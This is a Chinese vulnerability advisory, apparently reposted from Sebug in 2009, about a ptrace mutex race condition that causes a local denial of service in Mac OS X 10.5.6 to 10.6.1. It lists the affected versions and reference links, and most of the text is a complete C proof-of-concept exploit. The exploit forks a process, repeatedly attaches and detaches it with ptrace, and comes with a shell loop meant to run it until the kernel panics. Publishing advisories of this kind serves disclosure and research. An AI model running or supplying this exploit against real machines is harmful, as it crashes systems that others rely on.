Apple Mac OS X ptrace互斥锁处理本地拒绝服务漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-11-11
Apple Mac OS X ptrace互斥锁处理本地拒绝服务漏洞 影响版本:
Apple Mac OS X 10.6.1Apple Mac OS X 10.5.7Apple Mac OS X 10.5.6
漏洞描述:
BUGTRAQ  ID: 36915Mac OS X是苹果家族机器所使用的操作系统。Mac OS X的ptrace实现中在处理互斥锁时存在竞争条件,当系统内核试图与释放的互斥体相互锁定时可能触发这个错误,导致内核忙碌。
<*参考
Micheal Turner (wh1t3h4t3@yahoo.co.uk)

链接:http://secunia.com/advisories/37238/
http://marc.info/?l=full-disclosure&m=125734118204158&w=2
*>测试方法:[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!
/*  Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS   ==================================================  This code should be run in a loop and due to problems   with mutex handling in ptrace a DoS can occur when a   destroyed mutex is attempted to be interlocked by OSX   kernel giving rise to a race condition. You may need  to run this code multiple times.    - Tested against 10.5.6  - Tested against 10.5.7  - Tested against 10.6.1  while `true`;do ./prdelka-vs-APPLE-ptracepanic;done  -- prdelka*/#include <sys/types.h>#include <sys/ptrace.h>#include <stdio.h>#include <stdlib.h>int main(){	pid_t pid;	char *argv[] = {"id","","",0};	char *envp[] = {"",0};	pid = fork();	if(pid == 0){		usleep(100);		execve("/usr/bin/id",argv,envp);	}	else{		usleep(820);		if(ptrace(PT_ATTACH,pid,0,0)==0){			printf("[ PID: %d has been caught!/n",pid);			if(ptrace(PT_DETACH,pid,0,0)<0){				perror("Evil happens.");			}			usleep(1);			wait(0);			}		else{			perror("Fail!");		}	}	return(0);}
SEBUG安全建议:
厂商补丁:Apple-----目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.apple.com